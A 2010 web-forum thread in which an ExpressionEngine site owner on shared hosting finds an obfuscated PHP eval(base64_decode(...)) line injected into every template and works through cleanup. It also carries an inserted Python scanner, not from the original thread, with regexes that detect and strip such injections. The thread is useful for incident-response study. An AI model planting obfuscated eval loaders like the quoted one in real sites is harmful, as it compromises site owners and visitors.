Site was compromised with Malware! What do I do now?
Posted: 28 June 2010 11:48 AM
Joined: 2007-11-23
56 posts

To my surprise I woke up on Sunday morning to find that every one of my sites on my server had been compromised with malware that placed a chunk of .php code in EVERY php template on my server. I have 11 EE sites on my server, so as you can guess inside each of those folders are LOTS of php files. You can see the code below:

<?php /**/ eval(base64_decode("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"));?> 


This caused my sites to really look screwed up. My question is what do I do now? I can’t go in and delete this on every template that would take days.

Any ideas?

 
Posted: 28 June 2010 12:40 PM   [ # 1 ]   [ Rating: 0 ]
Joined: 2009-07-21
99 posts

If the piece of code is identical in each template can you not search and replace across files in something like Textmate or CODA. Of course the first thing to do is to establish how it got there…

 
Posted: 28 June 2010 03:42 PM   [ # 2 ]   [ Rating: 0 ]
Joined: 2004-05-15
29075 posts

Thank you for reporting this, jasonathopi. We take security very seriously and will do our best to work with you on figuring out what’s going on. To that end, we need some additional information from you. What version and build of EE are you using? Are there any other third-party scripts installed on your account, whether in use or not (phpBB, WordPress ...)?

I presume this is a shared hosting environment? Do tell your host about it as a matter of urgency. They can help us to determine the nature of this attack, whether they compromised some other script, whether it was a simple directory traversal attack, a stolen or cracked FTP password, etc.

While we work through this, please also check the following files:

- path.php
- config.php
- index.php

to make sure that there is no unusual code such as iFrames or JavaScript includes; it might be a good idea to replace all your files with a freshly downloaded set from expressionengine.com, upgrading to the latest build in the process.

Please ensure that you report this to your host immediately as only they can help us identify where the attack originated from so that steps can be taken to prevent this in the future.
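As an added example (not code from this thread, from EllisLab or from the Sucuri post), here is a small Python scanner that does what the replies above describe: it walks a site tree, reports PHP files carrying the eval(base64_decode(...)) prologue or other indicators worth a manual look in path.php/config.php/index.php (iframes, remote script includes), and strips only the exact injected prologue, keeping a .bak copy for the host's investigation. The regexes, file names and sample contents are constructed for illustration; the "aGVsbG8=" payload is just the word "hello".

```python
import re
import shutil
import tempfile
from pathlib import Path

# The exact prologue the thread describes: <?php /**/ eval(base64_decode("...")); ?> at the top of a file.
# The trailing \s* also eats the blank lines that stripping the prologue would otherwise leave behind.
INJECTED_RE = re.compile(r'<\?php\s*/\*\*/\s*eval\(base64_decode\("[A-Za-z0-9+/=]+"\)\);\s*\?>\s*')

# Indicators to report but never auto-remove (they need a human to decide).
SUSPECT_RES = {
    "eval_base64": re.compile(r'eval\s*\(\s*base64_decode\s*\('),
    "iframe": re.compile(r'<iframe\b', re.I),
    "remote_script": re.compile(r'<script[^>]+src\s*=\s*["\']https?://', re.I),
}

def scan_tree(root):
    """Return {relative path: [indicator names]} for every .php file under root that matches an indicator."""
    root = Path(root)
    findings = {}
    for path in root.rglob("*.php"):
        text = path.read_text(errors="replace")
        hits = [name for name, rx in SUSPECT_RES.items() if rx.search(text)]
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings

def clean_file(path, backup_suffix=".bak"):
    """Strip only the known injected prologue from one file, keeping a backup. Returns the number removed."""
    p = Path(path)
    cleaned, n = INJECTED_RE.subn("", p.read_text(errors="replace"))
    if n:
        shutil.copy2(p, str(p) + backup_suffix)  # keep the original for the host's investigation
        p.write_text(cleaned)
    return n

def demo():
    """Constructed sample tree (not from the thread): scan, clean, rescan. Returns (before, removed, after)."""
    root = tempfile.mkdtemp()
    Path(root, "templates").mkdir()
    Path(root, "templates", "index.php").write_text(
        '<?php /**/ eval(base64_decode("aGVsbG8="));?> \n\n<?php echo "site"; ?>\n')  # constructed infection
    Path(root, "config.php").write_text('<?php $conf = array(); ?>\n<iframe src="http://example.invalid/"></iframe>\n')
    Path(root, "path.php").write_text('<?php $system_path = "./admin/"; ?>\n')
    before = scan_tree(root)
    removed = sum(clean_file(Path(root, rel)) for rel in before)
    return before, removed, scan_tree(root)
```

The iframe in config.php is deliberately left in place after cleaning: only the exact known prologue is removed automatically, everything else is reported for review.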

 
Posted: 28 June 2010 10:15 PM   [ # 3 ]   [ Rating: 0 ]
Joined: 2007-11-23
56 posts

I have contacted my host and they told me that they couldn’t trace where it came from. I have had old WP installs on my server before but I don’t know where this hack came from.

In the meantime I have tried to fix a few of the sites, but I am having some major issues across the board. Using Dreamweaver’s Find and Replace (Coda only does 1 folder at a time) I took the code out of the templates. Also I have installed new EE files, but now…

1. The stylesheet is not being rendered as CSS. If you access the stylesheet being referenced in the html header, you will see the css code, but it is not being displayed as CSS (you can see an example here). Obviously because of this my site has no style to it (you can see that here). I have read some other forums about the issue maybe being in my path.php file, but my path.php file is exactly the same as working sites that I have on other servers.

2. After logging into the system/index.php I get a blank white page with “index.php?S=0&C=login&M=auth” at the end of my URL every time on every site I’m trying to fix. I have uploaded new system folders many times with no luck.

Here is my path file (“admin” is my “system”):

<?php

// ------------------------------------------------------
// DO NOT ALTER THIS FILE UNLESS YOU HAVE A REASON TO

// ------------------------------------------------------
// Path to the directory containing your backend files

$system_path = "./admin/";

// ------------------------------------------------------
// MANUALLY CONFIGURABLE VARIABLES
// See user guide for more information
// ------------------------------------------------------

$template_group = "";
$template = "";
$site_url = "";
$site_index = "";
$site_404 = "";
$global_vars = array(); // This array must be associative

?> 

For what it’s worth (it may be nothing), when I pull up any of the websites (with no style) and I right-click and select “view source”, there is a big “empty” space at the top of my code where the hacked .php code used to be, even though there is no empty space while I am editing all the files. It may be nothing, but it is odd.

I am running a few extensions such as LG Extension, WYGWAM, and FieldFrame. I’m not sure how to disable them without being able to get into my CP.

I am really getting desperate needing to fix these sites for my clients.

Any ideas for these issues?

 
Posted: 28 June 2010 10:49 PM   [ # 4 ]   [ Rating: 0 ]
Joined: 2007-11-23
56 posts

GOOD NEWS! Everything is working. I could’ve wasted a lot of time trying to find how deep this compromise ran, but I came across this site

http://blog.sucuri.net/2010/06/bluehost-ceo-blog-and-others-exploited-by-domainameat-cc.html

and it talked about how many sites with my hosting provider were hacked this weekend. This provides a script that will fix it instantly for you.

I’m going to start a new thread in case anyone else got hacked this weekend.

 
Posted: 28 June 2010 10:51 PM   [ # 5 ]   [ Rating: 0 ]
Joined: 2007-11-23
56 posts

If you have an EE site hosted on Bluehost you may have got hacked this weekend with malware. After HOURS of trying to fix this I found this site and it fixed everything instantly:

http://blog.sucuri.net/2010/06/bluehost-ceo-blog-and-others-exploited-by-domainameat-cc.html

You’re welcome….

 
Posted: 29 June 2010 02:02 AM   [ # 6 ]   [ Rating: 0 ]
Joined: 2004-03-22
12308 posts

jasonathopi,

I merged your new thread with this one to put it all in context. Thanks for following up on this. I am going to close this one out. Feel free to start a new thread if you have any more questions.
